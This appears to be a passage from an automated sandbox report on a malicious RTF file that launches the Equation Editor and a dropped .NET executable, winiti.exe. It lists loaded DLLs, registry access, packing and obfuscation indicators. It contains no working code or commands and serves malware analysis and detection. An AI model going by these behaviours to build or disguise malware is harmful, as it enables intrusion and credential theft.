Source: C:\Users\user\AppData\Roaming\winiti.exe	Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Users\user\AppData\Roaming\winiti.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: 2FBexXRCHR.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\2FBexXRCHR.rtf

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\winiti.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation

.NET source code contains potential unpacker

Source: 5.2.winiti.exe.37cc870.5.raw.unpack, wY0JxeJBuhumsKEEdp.cs	.Net Code: oQDraBlY6e System.Reflection.Assembly.Load(byte[])
Source: 5.2.winiti.exe.384a690.6.raw.unpack, wY0JxeJBuhumsKEEdp.cs	.Net Code: oQDraBlY6e System.Reflection.Assembly.Load(byte[])
Source: 5.2.winiti.exe.2485fb8.3.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 5.2.winiti.exe.2485fb8.3.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, wY0JxeJBuhumsKEEdp.cs	.Net Code: oQDraBlY6e System.Reflection.Assembly.Load(byte[])

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00307832 push ebx; ret	2_2_00307833
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00307A36 push ebx; ret	2_2_00307A37
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0030783A push ebx; ret	2_2_0030783B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00306B1B push edi; ret	2_2_00306B47
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0030731E push ebx; ret	2_2_0030731F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00306B0B push edi; ret	2_2_00306B17
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00306B76 push edi; ret	2_2_00306B77
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002F8F60 push eax; retf	2_2_002F8F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00306B4E push edi; ret	2_2_00306B57
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_003079B4 push ebx; ret	2_2_003079B7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_003069AC push edi; ret	2_2_00306A97
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002FC288 pushad ; retn 002Fh	2_2_002FC289
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00306CF2 push edi; ret	2_2_00306CF3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002F01F4 push eax; retf	2_2_002F01F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00306AEB push edi; ret	2_2_00306AF7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002FC3F0 push A0002FC4h; ret	2_2_002FC3F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_003077D2 push ebx; ret	2_2_003077D3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_003069CC push edi; ret	2_2_00306A97
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 5_2_0019B260 pushfd ; iretd	5_2_0019B26D
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 5_2_0019AD35 push esp; retf	5_2_0019AD36

Source: winiti[1].exe.2.dr	Static PE information: section name: .text entropy: 7.962364275489502
Source: winiti.exe.2.dr	Static PE information: section name: .text entropy: 7.962364275489502

Source: 5.2.winiti.exe.37cc870.5.raw.unpack, VowUMM871Fp8bDemBP.cs	High entropy of concatenated method names: 'zg9NYQMDKL', 'gr9NyR2uIg', 'FjPNZeB3hh', 'COPZl1kGnD', 'ROJZzo0OQT', 'n03Ni2bJSi', 'fOPNcmWdZw', 'Ok1NxuDJSn', 'tNTN2HAADS', 'k31NrSbbHO'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, bLe1PVPXUhjRYjopUa.cs	High entropy of concatenated method names: 'SyeLk60tW4', 'hPNLEIREsG', 'DteLnPwbjp', 'VScLQyWdfy', 'M89LSDXina', 'yuJLfyVN5w', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, wY0JxeJBuhumsKEEdp.cs	High entropy of concatenated method names: 'XVh2Gyi6t8', 'hBk2YctEcf', 'U0F2j1g4Sv', 'Ijo2ytU9fJ', 'LMe2otdIYh', 'gbZ2ZQTjvv', 'rdF2Na0qE8', 'ePD2JuGhHT', 'DY62FcglJh', 'bHI2ABrSVB'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, X7eG0gqJtgFhfpo9cM.cs	High entropy of concatenated method names: 'bj1LYGylCf', 'DuILjg4Dy9', 'lWkLyDSM5Q', 'nwLLo67wt3', 'UYyLZuUlC1', 'jFSLN1EsAx', 'OdNLJxlV3l', 'qbVLF7g1mR', 'OjoLAHE5LB', 'xj0LKo2doe'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, bejyHZrHlbbQAjmPBF.cs	High entropy of concatenated method names: 'vnqcN1lGeN', 'dqacJ9Rypn', 'zYCcAyZPlc', 'rn4cKFjT12', 'LUGcObk3mR', 'PLOc3IxEnr', 'Vy8Ep7TJOShcrX5SCi', 'TNSZPuxa3W7DKHfEpy', 'Pm1cchrIdn', 'UULc2eXrSk'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, EHf4hJcibXDdIwrcxWa.cs	High entropy of concatenated method names: 'GPh5pEEQct', 'G8X5661gvI', 'CZy5a4U08p', 'nZq5DoGqW3', 'qtQ5vDuOw5', 'Dbd5gNEK89', 'gWY5Mrs8GO', 'WPk5tB5Bqy', 'quU5Vp7nWO', 'Vlm5COD7hk'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, yCyWgaVYCyZPlcLn4F.cs	High entropy of concatenated method names: 'HAkyDvYNmP', 'SZUygFHJ2Z', 'OB6ytO5xS2', 'FqoyVSWLUw', 'R2gyO81kuG', 'Byny3n9PuV', 'ldIyRO4C0b', 'b3AyLdkjvC', 'lVcy5bsjsd', 'iAyyBye0YT'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, VtoD4klVEdWHcS8xeB.cs	High entropy of concatenated method names: 'UKy5cLfb4A', 'pAC520I54m', 'kU65rwnIB8', 'Rn75Y4D6QV', 'V5o5jcNDob', 'kaI5o1TUkf', 'v5r5ZRd5oW', 'RmSL4qW8B5', 'j6vLqtV9OZ', 'OT5LP8RBa3'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, X1lGeNtrqa9RypnK1A.cs	High entropy of concatenated method names: 'YgDjSugHe4', 'DT5jH0yfm8', 'KRUjXQ6YTs', 'uAxjUmo3CE', 'P0njm9FbH3', 'WAAjuAM8tH', 'vsej4E0JEX', 'pXUjqZuKT1', 'faUjPRECx7', 'MJEjlVNm5U'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, xVUQskdyggVyKpAr72.cs	High entropy of concatenated method names: 'f7vwtj0SC7', 'VPSwVAQLac', 'KCxwkD0K3U', 'q4kwEhbKvQ', 'HqmwQXNXqe', 'Vvkwf2A3la', 'BjBw8A9SUF', 'jA7wek2HYU', 'pQkwbBk9qP', 'Q2kw9F4BSc'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, iRONNpzmxgNG0DqyUV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T1m5wH5Yn9', 'c4f5OG4nxb', 'l8l53mMuSI', 'oYl5RVOprX', 'MBE5LPrRa5', 'HqA55jdoXd', 'JZt5BrVR7F'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, pmR0LOkIxEnrctQD2X.cs	High entropy of concatenated method names: 'qABZGbaA0y', 'aYfZjSI0TR', 'ElfZoYxmKo', 'BBoZNK6vIh', 'C9IZJ9JLvg', 'lFUomIWgoi', 'APoou49NSs', 'CCNo4uAXLe', 'UbooqD3BQ1', 'hXIoP1GXO3'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, HJtwWsj8mZcgkhR8CY.cs	High entropy of concatenated method names: 'Dispose', 'NsocPAKa0p', 'KCHxEd7Emf', 'R2O11l3QCo', 'kP7cleG0gJ', 'DgFczhfpo9', 'ProcessDialogKey', 'aMcxiLe1PV', 'SUhxcjRYjo', 'xUaxxutoD4'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, B5YNRDX6ACF01eAiIM.cs	High entropy of concatenated method names: 'ToString', 'Nsu390Z1BA', 'SaK3ENTDJv', 'hYv3nYwqOF', 'l5p3QpgJcf', 'nxv3fUV4C0', 'Emm3IFGDOo', 'Gci38T8Vuf', 'lfZ3elmMS4', 'SmP3hsFWrT'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, VFbsN9QyklDZced5yE.cs	High entropy of concatenated method names: 'XI9ZWFwfw3', 'MB4Zpjy1Dv', 'JydZabIBKP', 'LlDZDr8k0K', 'NVnZg9hrSP', 'psfZMdItIL', 'SuGZVx1T8N', 'vVgZCUskbI', 'hk6skP40O4dnFp3QKhA', 'Ku7SwC4EoRAAoQHc0w5'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, U53X4duKhnr0sejxel.cs	High entropy of concatenated method names: 'q9dRqDGSLG', 'XXCRltWufr', 'f9hLiNpZdr', 'mXYLci3loj', 'qU7R9xDhQu', 'NXwR00hpPM', 'YNVRdI8EpX', 'pvERS8IniO', 'oOdRHqhjL0', 'hPORXC46NU'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, gBacBfc2y4FvbqjllAT.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qNcBSa7Y5T', 'KHgBHecyXO', 'lRLBXZcd9H', 'LarBUEe9K9', 'pRWBm6E5qj', 'G32BunBv4O', 'b0vB4PbFXQ'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, l6A1ftxPNHNC6cEnNj.cs	High entropy of concatenated method names: 'MVqa9qiYD', 'Sv6DW5jXs', 'ccBgf7sAh', 'osjMMM8ul', 'Ra9VrVpAf', 'CSLCwFUEI', 'TY9Mjc82YuAdgD8rdA', 'yu16YS1rXxrEQugYJi', 'p80LVcEuh', 'DBYBgpLq1'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, gT12ZpCTTqeGReUGbk.cs	High entropy of concatenated method names: 'dLLovp63h9', 'W2loMMWpMV', 'R7PynHqqJc', 'Vq8yQJykct', 'ej6yf5RgtJ', 'fudyI4EVAe', 'cH7y8Ru1c8', 'Uc4yeTWctG', 'jusyhnZrry', 'hM3ybR2iyc'
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, OLaIZShKLuCmYa6fj7.cs	High entropy of concatenated method names: 'u1WNpQWdGg', 'YJ5N6gw1sU', 'gJZNaklB4w', 'xkNNDuXVAC', 'KOkNv2uvko', 't2aNgvY8cw', 'y3UNMD6XNP', 'SgANtVvx2q', 'Pk4NVwtCu7', 'J9mNCWetml'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, VowUMM871Fp8bDemBP.cs	High entropy of concatenated method names: 'zg9NYQMDKL', 'gr9NyR2uIg', 'FjPNZeB3hh', 'COPZl1kGnD', 'ROJZzo0OQT', 'n03Ni2bJSi', 'fOPNcmWdZw', 'Ok1NxuDJSn', 'tNTN2HAADS', 'k31NrSbbHO'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, bLe1PVPXUhjRYjopUa.cs	High entropy of concatenated method names: 'SyeLk60tW4', 'hPNLEIREsG', 'DteLnPwbjp', 'VScLQyWdfy', 'M89LSDXina', 'yuJLfyVN5w', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, wY0JxeJBuhumsKEEdp.cs	High entropy of concatenated method names: 'XVh2Gyi6t8', 'hBk2YctEcf', 'U0F2j1g4Sv', 'Ijo2ytU9fJ', 'LMe2otdIYh', 'gbZ2ZQTjvv', 'rdF2Na0qE8', 'ePD2JuGhHT', 'DY62FcglJh', 'bHI2ABrSVB'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, X7eG0gqJtgFhfpo9cM.cs	High entropy of concatenated method names: 'bj1LYGylCf', 'DuILjg4Dy9', 'lWkLyDSM5Q', 'nwLLo67wt3', 'UYyLZuUlC1', 'jFSLN1EsAx', 'OdNLJxlV3l', 'qbVLF7g1mR', 'OjoLAHE5LB', 'xj0LKo2doe'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, bejyHZrHlbbQAjmPBF.cs	High entropy of concatenated method names: 'vnqcN1lGeN', 'dqacJ9Rypn', 'zYCcAyZPlc', 'rn4cKFjT12', 'LUGcObk3mR', 'PLOc3IxEnr', 'Vy8Ep7TJOShcrX5SCi', 'TNSZPuxa3W7DKHfEpy', 'Pm1cchrIdn', 'UULc2eXrSk'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, EHf4hJcibXDdIwrcxWa.cs	High entropy of concatenated method names: 'GPh5pEEQct', 'G8X5661gvI', 'CZy5a4U08p', 'nZq5DoGqW3', 'qtQ5vDuOw5', 'Dbd5gNEK89', 'gWY5Mrs8GO', 'WPk5tB5Bqy', 'quU5Vp7nWO', 'Vlm5COD7hk'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, yCyWgaVYCyZPlcLn4F.cs	High entropy of concatenated method names: 'HAkyDvYNmP', 'SZUygFHJ2Z', 'OB6ytO5xS2', 'FqoyVSWLUw', 'R2gyO81kuG', 'Byny3n9PuV', 'ldIyRO4C0b', 'b3AyLdkjvC', 'lVcy5bsjsd', 'iAyyBye0YT'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, VtoD4klVEdWHcS8xeB.cs	High entropy of concatenated method names: 'UKy5cLfb4A', 'pAC520I54m', 'kU65rwnIB8', 'Rn75Y4D6QV', 'V5o5jcNDob', 'kaI5o1TUkf', 'v5r5ZRd5oW', 'RmSL4qW8B5', 'j6vLqtV9OZ', 'OT5LP8RBa3'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, X1lGeNtrqa9RypnK1A.cs	High entropy of concatenated method names: 'YgDjSugHe4', 'DT5jH0yfm8', 'KRUjXQ6YTs', 'uAxjUmo3CE', 'P0njm9FbH3', 'WAAjuAM8tH', 'vsej4E0JEX', 'pXUjqZuKT1', 'faUjPRECx7', 'MJEjlVNm5U'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, xVUQskdyggVyKpAr72.cs	High entropy of concatenated method names: 'f7vwtj0SC7', 'VPSwVAQLac', 'KCxwkD0K3U', 'q4kwEhbKvQ', 'HqmwQXNXqe', 'Vvkwf2A3la', 'BjBw8A9SUF', 'jA7wek2HYU', 'pQkwbBk9qP', 'Q2kw9F4BSc'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, iRONNpzmxgNG0DqyUV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T1m5wH5Yn9', 'c4f5OG4nxb', 'l8l53mMuSI', 'oYl5RVOprX', 'MBE5LPrRa5', 'HqA55jdoXd', 'JZt5BrVR7F'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, pmR0LOkIxEnrctQD2X.cs	High entropy of concatenated method names: 'qABZGbaA0y', 'aYfZjSI0TR', 'ElfZoYxmKo', 'BBoZNK6vIh', 'C9IZJ9JLvg', 'lFUomIWgoi', 'APoou49NSs', 'CCNo4uAXLe', 'UbooqD3BQ1', 'hXIoP1GXO3'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, HJtwWsj8mZcgkhR8CY.cs	High entropy of concatenated method names: 'Dispose', 'NsocPAKa0p', 'KCHxEd7Emf', 'R2O11l3QCo', 'kP7cleG0gJ', 'DgFczhfpo9', 'ProcessDialogKey', 'aMcxiLe1PV', 'SUhxcjRYjo', 'xUaxxutoD4'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, B5YNRDX6ACF01eAiIM.cs	High entropy of concatenated method names: 'ToString', 'Nsu390Z1BA', 'SaK3ENTDJv', 'hYv3nYwqOF', 'l5p3QpgJcf', 'nxv3fUV4C0', 'Emm3IFGDOo', 'Gci38T8Vuf', 'lfZ3elmMS4', 'SmP3hsFWrT'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, VFbsN9QyklDZced5yE.cs	High entropy of concatenated method names: 'XI9ZWFwfw3', 'MB4Zpjy1Dv', 'JydZabIBKP', 'LlDZDr8k0K', 'NVnZg9hrSP', 'psfZMdItIL', 'SuGZVx1T8N', 'vVgZCUskbI', 'hk6skP40O4dnFp3QKhA', 'Ku7SwC4EoRAAoQHc0w5'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, U53X4duKhnr0sejxel.cs	High entropy of concatenated method names: 'q9dRqDGSLG', 'XXCRltWufr', 'f9hLiNpZdr', 'mXYLci3loj', 'qU7R9xDhQu', 'NXwR00hpPM', 'YNVRdI8EpX', 'pvERS8IniO', 'oOdRHqhjL0', 'hPORXC46NU'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, gBacBfc2y4FvbqjllAT.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qNcBSa7Y5T', 'KHgBHecyXO', 'lRLBXZcd9H', 'LarBUEe9K9', 'pRWBm6E5qj', 'G32BunBv4O', 'b0vB4PbFXQ'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, l6A1ftxPNHNC6cEnNj.cs	High entropy of concatenated method names: 'MVqa9qiYD', 'Sv6DW5jXs', 'ccBgf7sAh', 'osjMMM8ul', 'Ra9VrVpAf', 'CSLCwFUEI', 'TY9Mjc82YuAdgD8rdA', 'yu16YS1rXxrEQugYJi', 'p80LVcEuh', 'DBYBgpLq1'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, gT12ZpCTTqeGReUGbk.cs	High entropy of concatenated method names: 'dLLovp63h9', 'W2loMMWpMV', 'R7PynHqqJc', 'Vq8yQJykct', 'ej6yf5RgtJ', 'fudyI4EVAe', 'cH7y8Ru1c8', 'Uc4yeTWctG', 'jusyhnZrry', 'hM3ybR2iyc'
Source: 5.2.winiti.exe.384a690.6.raw.unpack, OLaIZShKLuCmYa6fj7.cs	High entropy of concatenated method names: 'u1WNpQWdGg', 'YJ5N6gw1sU', 'gJZNaklB4w', 'xkNNDuXVAC', 'KOkNv2uvko', 't2aNgvY8cw', 'y3UNMD6XNP', 'SgANtVvx2q', 'Pk4NVwtCu7', 'J9mNCWetml'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, VowUMM871Fp8bDemBP.cs	High entropy of concatenated method names: 'zg9NYQMDKL', 'gr9NyR2uIg', 'FjPNZeB3hh', 'COPZl1kGnD', 'ROJZzo0OQT', 'n03Ni2bJSi', 'fOPNcmWdZw', 'Ok1NxuDJSn', 'tNTN2HAADS', 'k31NrSbbHO'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, bLe1PVPXUhjRYjopUa.cs	High entropy of concatenated method names: 'SyeLk60tW4', 'hPNLEIREsG', 'DteLnPwbjp', 'VScLQyWdfy', 'M89LSDXina', 'yuJLfyVN5w', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, wY0JxeJBuhumsKEEdp.cs	High entropy of concatenated method names: 'XVh2Gyi6t8', 'hBk2YctEcf', 'U0F2j1g4Sv', 'Ijo2ytU9fJ', 'LMe2otdIYh', 'gbZ2ZQTjvv', 'rdF2Na0qE8', 'ePD2JuGhHT', 'DY62FcglJh', 'bHI2ABrSVB'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, X7eG0gqJtgFhfpo9cM.cs	High entropy of concatenated method names: 'bj1LYGylCf', 'DuILjg4Dy9', 'lWkLyDSM5Q', 'nwLLo67wt3', 'UYyLZuUlC1', 'jFSLN1EsAx', 'OdNLJxlV3l', 'qbVLF7g1mR', 'OjoLAHE5LB', 'xj0LKo2doe'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, bejyHZrHlbbQAjmPBF.cs	High entropy of concatenated method names: 'vnqcN1lGeN', 'dqacJ9Rypn', 'zYCcAyZPlc', 'rn4cKFjT12', 'LUGcObk3mR', 'PLOc3IxEnr', 'Vy8Ep7TJOShcrX5SCi', 'TNSZPuxa3W7DKHfEpy', 'Pm1cchrIdn', 'UULc2eXrSk'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, EHf4hJcibXDdIwrcxWa.cs	High entropy of concatenated method names: 'GPh5pEEQct', 'G8X5661gvI', 'CZy5a4U08p', 'nZq5DoGqW3', 'qtQ5vDuOw5', 'Dbd5gNEK89', 'gWY5Mrs8GO', 'WPk5tB5Bqy', 'quU5Vp7nWO', 'Vlm5COD7hk'
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, yCyWgaVYCyZPlcLn4F.cs	High entropy of concatenated method names: 'HAkyDvYNmP', 'SZUygFHJ2Z', 'OB6ytO5xS2', 'FqoyVSWLUw', 'R2gyO81kuG', 'Byny3n9PuV', 'ldIyRO4C0b', 'b3AyLdkjvC', 'lVcy5bsjsd', 'iAyyBye0YT'
